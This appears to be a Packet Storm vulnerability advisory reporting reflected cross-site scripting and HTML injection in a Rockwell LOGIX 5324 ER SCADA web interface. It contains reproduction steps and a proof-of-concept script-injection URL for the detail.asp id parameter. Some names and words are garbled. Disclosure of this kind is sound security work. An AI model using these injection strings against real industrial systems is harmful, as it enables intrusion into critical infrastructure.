Rockwell LOGIX 5324 ER Cross Site Scripting

2018-04-03T00:00:00
ID PACKETSTORM:147029
Type packetstorm
Reporter Sezai Ali HOROZOGLU
Modified 2018-04-03T00:00:00

Description

                                        
                                            ` Vulnerable Product(s): Rockwell SCADA/ICS System  
Affected Version(s): Rockwell LOGIX 5324 ER  
Vulnerability Typus: Cross Site Scripting & HTML Adegnjection  
  
Description:  
SCADA systems are crucial for industrial organizations since they help to  
maintain efficiency, process data for smarter decisions, and communicate  
system issues to help mitigate downtime.  
  
The basic SCADA architecture begins with programmable logic controllers  
(PLCs) or remote terminal units (RTUs). PLCs and RTUs are microcomputers  
that communicate with an array of objects such as factory machines, HMIs,  
sensors, and end devices, and then route the information from those objects  
to computers with SCADA software. The SCADA software processes,  
distributes, and displays the data, helping operators and other employees  
analyze the data and make important decisions.  
  
Technical Details:  
  
1. Start the application  
2. Go to ipadress.com/ sysform/detail.asp?id=<script>alert(1);</script>  
3. oopss. XSS detected  
4. Go to sysform/detail.asp?id=html code  
5. oppss html injection detected  
  
PoC or Exploitcode:  
ipadress/sysform/detail.asp?id=<script>alert(1);</script>  
ipadress/sysform/detail.asp?id=html code  
  
Author/Group: Adegsmail BALBAL & Sezai Ali HOROZOALU  
  
Vendor-URL: https://www.rockwellautomation.com/  
Product-URL: https://www.rockwellautomation.com/  
`